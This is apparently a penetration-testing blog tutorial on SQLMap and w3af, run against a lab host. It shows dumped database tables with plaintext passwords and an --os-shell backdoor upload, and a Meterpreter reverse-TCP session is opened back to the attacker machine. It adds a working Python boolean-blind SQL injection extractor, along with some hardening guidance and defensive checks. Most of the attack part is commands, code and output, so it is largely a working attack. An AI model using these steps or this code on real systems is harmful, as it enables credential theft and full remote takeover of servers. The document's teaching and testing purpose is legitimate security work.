How to: SQLMap (dump and destroy)

SQLMap is the tool for automating the exploitation of SQL injection vulnerabilities, and it is very popular for exactly that. While most web hacking enthusiasts know it as a tool for gathering information and retrieving table contents, I want to show how powerful SQLMap is beyond being just "a database dumper tool".

I will split this into three sections: SQLMap as a fingerprinter (we already know this one), as an enumerator (of course), and as a destroyer (hmm..?!). Check it out.

Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818"

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 22:26:52

[22:26:52] [INFO] using '/pentest/database/sqlmap/output/192.168.1.102/session' as session file
[22:26:52] [INFO] resuming match ratio '0.972' from session file
[22:26:52] [INFO] resuming injection point 'GET' from session file
[22:26:52] [INFO] resuming injection parameter 'id' from session file
[22:26:52] [INFO] resuming injection type 'numeric' from session file
[22:26:52] [INFO] resuming 0 number of parenthesis from session file
[22:26:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:26:52] [INFO] resuming remote absolute path of temporary files directory 'C:/WINDOWS/Temp' from session file
[22:26:52] [INFO] testing connection to the target url
[22:26:52] [INFO] testing for parenthesis on injectable parameter
[22:26:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5


[*] shutting down at: 22:26:52

Yes, we all know this part: it reports the database engine and version, the web server software, and the operating system. Note that everything above was "resumed" from the session file of an earlier run, so nothing was re-tested; delete the session file (in current versions, --flush-session) if you want SQLMap to start over against the target.

Enumerate Database

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --dbs

---------------------------------------------------------------------

[22:28:41] [INFO] fetching database names
[22:28:41] [INFO] fetching number of databases
[22:28:41] [INFO] retrieved: 6
[22:28:41] [INFO] retrieved: information_schema
[22:28:44] [INFO] retrieved: cdcol
[22:28:45] [INFO] retrieved: mysql
[22:28:46] [INFO] retrieved: phpmyadmin
[22:28:47] [INFO] retrieved: test
[22:28:48] [INFO] retrieved: webappdb
available databases [6]:
[*] cdcol
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] webappdb

Dumping the database names, yes... SQLMap always does the great stuff! Each "retrieved:" line is one value pulled through the injection; the match ratio in the log means a boolean-based technique is in use, so each value is recovered character by character, which is why the names arrive about a second apart.

Enumerate tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" -D webappdb --tables

[22:32:32] [INFO] fetching tables for database 'webappdb'
[22:32:32] [INFO] fetching number of tables for database 'webappdb'
[22:32:32] [INFO] retrieved: 2
[22:32:33] [INFO] retrieved: guestbook
[22:32:34] [INFO] retrieved: users
Database: webappdb
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Dump the table (the command line was not pasted; the output matches -D webappdb -T users --dump, and the "read from file" lines mean the column names and rows are being replayed from the session file of an earlier run rather than fetched again)

[22:36:54] [INFO] fetching columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 4
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': id
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': name
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': country
[22:36:54] [INFO] fetching entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 1
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': admin
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 123456
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 2
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': secret
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': SG
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': backup
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': backup12
Database: webappdb
Table: users
[3 entries]
+---------+----+--------+----------+
| country | id | name   | password |
+---------+----+--------+----------+
| ID      | 1  | admin  | 123456   |
| ID      | 2  | secret | password |
| SG      | 3  | backup | backup12 |
+---------+----+--------+----------+

[22:36:54] [INFO] Table 'webappdb.users' dumped to CSV file '/pentest/database/sqlmap/output/192.168.1.102/dump/webappdb/users.csv'
[22:36:54] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.102'

[*] shutting down at: 22:36:54
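As an added example (my code, not sqlmap's and not from the original post), here is what those "retrieved:" lines amount to under the hood: boolean-based blind extraction driven by page similarity, run against a constructed vulnerable handler that stands in for vid.php?id=818. The target is an in-memory SQLite database rather than MySQL, so sqlite_master stands in for information_schema and unicode()/substr() for MySQL's ORD()/SUBSTRING(); the handler, the sample data and the 0.98 similarity threshold are assumptions. The hardened handler next to it shows that binding the parameter makes the oracle disappear.

```python
# Added example: not from the original post and not sqlmap's code.
# The vulnerable endpoint is simulated with an in-memory SQLite database
# (standing in for vid.php?id=818 on MySQL); sqlite_master plays the role of
# information_schema.tables. All data below is constructed.
import difflib
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE videos (id INTEGER, title TEXT);
INSERT INTO videos VALUES (818, 'Sample video');
CREATE TABLE guestbook (id INTEGER, msg TEXT);
CREATE TABLE users (id INTEGER, name TEXT, password TEXT, country TEXT);
INSERT INTO users VALUES (1,'admin','123456','ID'), (2,'secret','password','ID'),
                         (3,'backup','backup12','SG');
""")

def render(row):
    if row is None:
        return "<html><body><p>No such video</p></body></html>"
    return f"<html><body><h1>{row[0]}</h1></body></html>"

def vid_page_vulnerable(id_param: str) -> str:
    """Constructed vulnerable handler: the untrusted id is concatenated into the SQL."""
    try:
        return render(conn.execute("SELECT title FROM videos WHERE id=" + id_param).fetchone())
    except sqlite3.Error:
        return "<html><body><p>Database error</p></body></html>"

def vid_page_fixed(id_param: str) -> str:
    """Hardened handler: the id is validated and bound, so '818 AND 1=1' is just a bad id."""
    try:
        vid = int(id_param)
    except ValueError:
        return "<html><body><p>Bad request</p></body></html>"
    return render(conn.execute("SELECT title FROM videos WHERE id=?", (vid,)).fetchone())

class BlindInjector:
    """Boolean-based blind inference driven by page similarity, the way sqlmap does it."""

    def __init__(self, page_fn, threshold: float = 0.98):
        self.page = page_fn
        self.base = page_fn("818")   # reference page for the untouched request
        self.threshold = threshold   # same job as sqlmap's 'match ratio'
        self.requests = 1

    def ask(self, condition: str) -> bool:
        """True if 'id=818 AND (condition)' renders the same page as 'id=818'."""
        self.requests += 1
        probe = self.page(f"818 AND ({condition})")
        return difflib.SequenceMatcher(None, self.base, probe).ratio() >= self.threshold

    def is_injectable(self) -> bool:
        """sqlmap's first test: a true condition keeps the page, a false one changes it."""
        return self.ask("1=1") and not self.ask("1=2")

    def integer(self, expr: str, lo: int = 0, hi: int = 255) -> int:
        """Recover an integer-valued SQL expression by binary search over the oracle."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"({expr}) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def string(self, expr: str, max_len: int = 64) -> str:
        """Recover a string one character at a time: this is one 'retrieved:' line."""
        length = self.integer(f"length(({expr}))", 0, max_len)
        return "".join(chr(self.integer(f"unicode(substr(({expr}), {i}, 1))"))
                       for i in range(1, length + 1))

    def tables(self) -> list:
        """Equivalent of --tables: count the tables, then fetch each name by offset."""
        n = self.integer("SELECT count(*) FROM sqlite_master WHERE type='table'", 0, 64)
        return [self.string("SELECT name FROM sqlite_master WHERE type='table' "
                            f"ORDER BY name LIMIT 1 OFFSET {k}") for k in range(n)]

    def column(self, table: str, col: str) -> list:
        """Equivalent of --dump for one column, in id order."""
        n = self.integer(f"SELECT count(*) FROM {table}", 0, 64)
        return [self.string(f"SELECT {col} FROM {table} ORDER BY id LIMIT 1 OFFSET {k}")
                for k in range(n)]

def attack(page_fn) -> dict:
    """Injectability check, table enumeration and a dump of users, plus the request cost."""
    inj = BlindInjector(page_fn)
    if not inj.is_injectable():
        return {"injectable": False, "requests": inj.requests}
    rows = list(zip(inj.column("users", "name"), inj.column("users", "password")))
    return {"injectable": True, "tables": inj.tables(), "users": rows, "requests": inj.requests}
```

attack(vid_page_vulnerable) returns the three table names and the users rows after several hundred requests, the same one-value-at-a-time cost that shows up in the timestamps above; attack(vid_page_fixed) reports the parameter as not injectable because the bound query never evaluates the injected condition.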

SQLMap has done a great job so far 🙂 Next, take over the system!!

Remote Command Execution

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --os-shell

[22:51:25] [INFO] trying to upload the uploader agent

which web application language does the web server support?


[1] ASP (default)
[2] PHP
[3] JSP
>2
[22:51:27] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/]:
[22:51:28] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [C:/xampp/htdocs/]:
[22:51:28] [INFO] the uploader agent has been successfully uploaded on 'C:/xampp/htdocs/' ('http://192.168.1.102:80/tmpuduwd.php')
[22:51:28] [INFO] the backdoor has probably been successfully uploaded on 'C:/xampp/htdocs/', go with your browser to 'http://192.168.1.102:80//tmpbpjbr.php' and enjoy it!
[22:51:28] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] a
command standard output:
---
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.1.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
---
os-shell>

Metasploit's Meterpreter over SQL Injection

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --msf-path=/opt/metasploit3/msf3 --os-pwn

This time SQLMap uploads a PHP file containing shell_exec() so that it can run arbitrary commands on the remote system through PHP. Once that is in place, SQLMap calls msfpayload (the Metasploit payload generator) to build a Meterpreter backdoor as a Windows portable executable, encodes it, and uploads it through the PHP shell.

With the executable uploaded, SQLMap starts the Metasploit listener (exploit/multi/handler) and waits for the uploaded executable to be run. Once it runs, the Meterpreter session comes up 🙂 The session has whatever privileges the process that launched the stager had, here the web server's, which is why it arrives below as NT AUTHORITY\SYSTEM.
I will skip some output here, because it is too long to include.
---- everything before this line is the PHP shell being created and uploaded to the document root ----
[22:57:05] [INFO] creating Metasploit Framework 3 payload stager
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>1


which is the local address? [192.168.1.100]
which local port number do you want to use? [31503]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which payload encoding do you want to use?
[1] No Encoder
[2] Alpha2 Alphanumeric Mixedcase Encoder
[3] Alpha2 Alphanumeric Uppercase Encoder
[4] Avoid UTF8/tolower
[5] Call+4 Dword XOR Encoder
[6] Single-byte XOR Countdown Encoder
[7] Variable-length Fnstenv/mov Dword XOR Encoder
[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
[9] Non-Alpha Encoder
[10] Non-Upper Encoder
[11] Polymorphic XOR Additive Feedback Encoder (default)
[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
> 11
[22:57:46] [INFO] creation in progress ................ done
[22:58:03] [INFO] compression in progress . done
[22:58:04] [INFO] uploading payload stager to 'C:/xampp/htdocs/tmpmtonj.exe'
[22:58:04] [INFO] running Metasploit Framework 3 command line interface locally, wait..
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.100:31503
[*] Starting the payload handler...
[22:58:27] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
[*] Sending stage (748544 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.100:31503 -> 192.168.1.102:2561)
meterpreter> Loading extension espia...success.
meterpreter> Loading extension incognito...success.
meterpreter> Loading extension priv...success.
meterpreter> Loading extension sniffer...success.
meterpreter> Computer: XP_FDCC
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter> Server username: NT AUTHORITY\SYSTEM
meterpreter>

meterpreter> shell
Process 3128 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


C:>



OS Pwned! (The PHP agent, the backdoor and the stager .exe that SQLMap dropped into C:/xampp/htdocs are still sitting there; remove them when the engagement is over.)
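The --os-shell and --os-pwn runs above only worked because the database could write into C:/xampp/htdocs: on MySQL, sqlmap drops the PHP agent and the stager with SELECT ... INTO DUMPFILE (or OUTFILE), which needs the FILE privilege and a secure_file_priv setting that does not block the path (plus a document root, which sqlmap had to be told here). The following check, an added example that is not from the original post or from sqlmap, evaluates those two MySQL-side conditions from SHOW GRANTS and SHOW VARIABLES output. The grant lines, account names and paths are constructed; the "XAMPP" sample assumes the stock root account with an empty secure_file_priv.

```python
# Added example: not from the original post and not sqlmap's code. The
# grant and variable lines below are constructed to look like SHOW GRANTS
# and SHOW VARIABLES output; account names and paths are illustrative.
import re
from pathlib import PurePosixPath, PureWindowsPath

GRANT_RE = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+", re.IGNORECASE)

def has_file_privilege(grant_lines) -> bool:
    """FILE is a global privilege: only 'GRANT ... ON *.*' can carry it, and ALL includes it.
    ALL PRIVILEGES on a single database (ON db.*) does not grant FILE."""
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & {"ALL", "ALL PRIVILEGES", "FILE"}:
            return True
    return False

def outfile_allowed(secure_file_priv, target_dir: str, windows: bool = False) -> bool:
    """secure_file_priv semantics: NULL disables INTO OUTFILE/DUMPFILE entirely, the empty
    string allows any path the server process can write, and a directory restricts writes
    to that directory tree."""
    if secure_file_priv is None or str(secure_file_priv).upper() == "NULL":
        return False
    if secure_file_priv == "":
        return True
    Path = PureWindowsPath if windows else PurePosixPath
    target, allowed = Path(target_dir), Path(secure_file_priv)
    return target == allowed or allowed in target.parents

def assess(grant_lines, variables: dict, docroot: str, windows: bool = False) -> dict:
    """Can the database account drop a file into the web root the way --os-shell needs?
    Both conditions must hold; the report lists which ones do."""
    reasons = []
    if has_file_privilege(grant_lines):
        reasons.append("account holds FILE (or ALL) on *.*")
    sfp = variables.get("secure_file_priv")
    if outfile_allowed(sfp, docroot, windows):
        reasons.append(f"secure_file_priv={sfp!r} permits writing under {docroot}")
    return {"file_write_possible": len(reasons) == 2, "reasons": reasons}

# Constructed samples: a default XAMPP-style setup versus a least-privilege one.
XAMPP_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
XAMPP_VARS = {"secure_file_priv": ""}
HARDENED_GRANTS = ["GRANT USAGE ON *.* TO 'webapp'@'localhost'",
                   "GRANT SELECT, INSERT, UPDATE ON `webappdb`.* TO 'webapp'@'localhost'"]
HARDENED_VARS = {"secure_file_priv": "/var/lib/mysql-files"}
```

Feed it the lines from SHOW GRANTS FOR CURRENT_USER() and SHOW VARIABLES LIKE 'secure_file_priv' taken from the account the web application really connects with. The fix is the hardened sample: a per-application account without FILE, and secure_file_priv pointing at a directory that is not the web root (newer MySQL releases default to a restricted directory; the 5.x-era XAMPP in this post did not). Whether mysqld can actually write to the document root is a filesystem question this check cannot answer.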

OWASP ModSecurity Core Rule Set

ModSecurity is a good starting point for securing your web site. OWASP provides the Core Rule Set (CRS), a set of ModSecurity rules against the most critical web application attacks, including SQL injection of the kind automated above.

From OWASP:

ModSecurity is an Apache web server module that provides a web application firewall engine. The ModSecurity Rules Language engine is extremely flexible and robust and has been referred to as the "Swiss Army Knife of web application firewalls."

In order to enable users to take full advantage of ModSecurity out of the box, we have developed the Core Rule Set (CRS) which provides critical protections against attacks across most every web architecture.

Check the OWASP Core Rule Set home page for more info.

Download here

Auditing a website with w3af

Overview

w3af (Web Application Attack and Audit Framework) is quite similar to Metasploit; the difference is only in what it works on. w3af focuses on the web application, whereas Metasploit is aimed more at the operating system as a whole. w3af is free and open source and is made up of several groups of attack plugins: mangle, grep, discovery, audit, evasion, and bruteforce.

Preparation

To get w3af ready, a number of Python packages have to be installed, such as python-soappy, python-pyopenssl, and so on. I installed it on Linux Mint 5.0, which is Ubuntu-based, so it was little trouble (the Debian family makes installation and package dependencies easy). The installation guide is on the w3af site at SourceForge.

Once everything is installed, you can start right away:

$ ./w3af
w3af>>>

Use the 'help' command to see the help (mandatory):

w3af>>> help
The following commands are available:
help You are here. help [command] prints more specific help.
http-settings Configure the URL opener.
misc-settings Configure w3af misc settings.
plugins Enable, disable and configure plugins.
profiles List and start scan profiles.
start Start site analysis.
exploit Exploit a vulnerability.
tools Enter the tools section.
target Set the target URL.
version Show the w3af version.
exit Exit w3af.
w3af>>>

w3af's console is different from Metasploit's. I was confused at first, but after a little study it became clear that you drive the w3af console by typing the items listed in the help menu, and you type 'back' to return to the previous menu. We will try it directly on a target.

Configuration

w3af>>> target
w3af/target>>> help
The following commands are available:
help You are here. help [command|parameter] prints more specific help.
set Set a parameter value.
view List all configuration parameters and current values.
back Return to previous menu.
w3af/target>>> set target http://demo.testfire.net
w3af/target>>> view

The target is now set; next, the plugins for auditing:

w3af/target>>> back
w3af>>> plugins
w3af/plugins>>> help
The following commands are available:
help You are here. help [command] prints more specific help.
list List all available plugins.
bruteforce Enable and configure bruteforce plugins.
discovery Enable and configure discovery plugins.
output Enable and configure output plugins.
mangle Enable and configure mangle plugins.
audit Enable and configure audit plugins.
evasion Enable and configure evasion plugins.
grep Enable and configure grep plugins.
back Return to previous menu.
w3af/plugins>>>

w3af needs at least three plugin groups loaded: discovery, audit, and output. To see what each group contains, run 'list' followed by the group name; 'list audit', for example, shows all the audit plugins such as xss, xsrf, SQL injection, LDAP injection, etc. Typing the group name followed by a comma-separated list enables those plugins, and typing the group name on its own shows which ones are enabled. For example:

w3af/plugins>>> audit xss,sqli,xpath,remoteFileInclude,blindSqli
w3af/plugins>>>

or alternatively...

w3af/plugins>>> audit all

I am going to test a web server for SQL injection, crawl the site's links, get real-time reporting on the console and also an HTML report. Here are the steps.

w3af/plugins>>> audit sqli
w3af/plugins>>> audit
Enabled audit plugins:
sqli
w3af/plugins>>> discovery webSpider,pykto,hmap
w3af/plugins>>> discovery
Enabled discovery plugins:
webSpider
hmap
pykto
w3af/plugins>>> output console,htmlFile
w3af/plugins>>> output
Enabled output plugins:
htmlFile
console
w3af/plugins>>> output config htmlFile
w3af/plugin/htmlFile>>> view
Parameter Value Description
========= ===== ===========
httpFileName output-http.txt File name where this plugin will write HTTP requests and responses
reportDebug False True if debug information will be appended to the report.
fileName report.html File name where this plugin will write to
w3af/plugin/htmlFile>>>

That is a simple configuration for testing the web server: webSpider crawls directories and links, pykto audits the web server (pykto is the Python port of nikto), and hmap fingerprints the web server software. The results are written to output-http.txt and report.html.

w3af/plugin/htmlFile>>> back
w3af/plugins>>> back
w3af>>> start

Wait until the audit finishes.

w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
Auto-enabling plugin: discovery.serverHeader
The Server header for this HTTP server is: squid/2.6.STABLE5
Server uses 503 instead of HTTP 404 error code.
pykto plugin is using "squid/2.6.STABLE5" as the remote server type. This information was obtained by serverHeader plugin.
Error when requesting: http://demo.testfire.net/
Error: Too many retries when trying to get: http://demo.testfire.net/

http://demo.testfire.net/

pykto plugin found a vulnerability at URL: http://demo.testfire.net/modules.php . Vulnerability description: PHP Nuke module allows user names and passwords to be viewed. See http://www.frog-man.org/tutos/PHP-Nuke6.0-Members_List-Your_Account.txt for other SQL exploits in this module. The vulnerability was found in the request with id 2330.
pykto plugin found a vulnerability at URL: http://demo.testfire.net/bank/ . Vulnerability description: This might be interesting… The vulnerability was found in the request with id 3315.
Hmap web server fingerprint is starting, this may take a while.
hmap: Connection failed to demo.testfire.net:80
New URL found by pykto plugin: http://demo.testfire.net/modules.php
New URL found by pykto plugin: http://demo.testfire.net/bank/
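As an added example (mine, not part of the original post and not w3af code), here is a small parser for the console output above that turns each finding into a record keyed by its request id, so the raw request and response can be looked up in output-http.txt, and that flags the scan as incomplete when requests failed. That matters here: the spider could not fetch the root URL, hmap could not connect, and the server answers 503 instead of 404, so the two pykto hits are signature matches that need their request checked before they are believed. The sample text is constructed from the lines above.

```python
# Added example: not from the original post and not w3af's own code.
# SAMPLE is constructed from the console lines shown in the post.
import re
from dataclasses import dataclass

FINDING_RE = re.compile(
    r"^(?P<plugin>\w+) plugin found a vulnerability at URL: (?P<url>\S+) \. "
    r"Vulnerability description: (?P<desc>.*?) ?"
    r"The vulnerability was found in the request with id (?P<rid>\d+)\.$")
NEW_URL_RE = re.compile(r"^New URL found by (?P<plugin>\w+) plugin: (?P<url>\S+)$")
SERVER_RE = re.compile(r"^The Server header for this HTTP server is: (?P<server>.+)$")
ERROR_RE = re.compile(r"^(?:Error|Error when requesting|\w+: Connection failed).*$")

@dataclass
class Finding:
    plugin: str
    url: str
    description: str
    request_id: int   # key into the httpFileName log (output-http.txt) for the raw exchange

def parse_console(text: str) -> dict:
    """Turn w3af console output into findings, discovered URLs, the server banner and errors.
    'incomplete' is set whenever a request failed, so signature hits are not taken at face value."""
    findings, new_urls, errors, server = [], [], [], None
    for line in text.splitlines():
        line = line.strip()
        if (m := FINDING_RE.match(line)):
            findings.append(Finding(m["plugin"], m["url"], m["desc"].strip(), int(m["rid"])))
        elif (m := NEW_URL_RE.match(line)):
            new_urls.append(m["url"])
        elif (m := SERVER_RE.match(line)):
            server = m["server"]
        elif ERROR_RE.match(line):
            errors.append(line)
    return {"server": server, "findings": findings, "new_urls": new_urls,
            "errors": errors, "incomplete": bool(errors)}

SAMPLE = """\
Auto-enabling plugin: discovery.serverHeader
The Server header for this HTTP server is: squid/2.6.STABLE5
Server uses 503 instead of HTTP 404 error code.
Error: Too many retries when trying to get: http://demo.testfire.net/
pykto plugin found a vulnerability at URL: http://demo.testfire.net/modules.php . Vulnerability description: PHP Nuke module allows user names and passwords to be viewed. The vulnerability was found in the request with id 2330.
pykto plugin found a vulnerability at URL: http://demo.testfire.net/bank/ . Vulnerability description: This might be interesting... The vulnerability was found in the request with id 3315.
hmap: Connection failed to demo.testfire.net:80
New URL found by pykto plugin: http://demo.testfire.net/modules.php
New URL found by pykto plugin: http://demo.testfire.net/bank/
"""
```

parse_console(SAMPLE) yields two findings with request ids 2330 and 3315, two new URLs, the squid banner, and incomplete=True because of the retry and connection errors; pipe a real console run into a file and pass its text in the same way.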

Happy testing ^^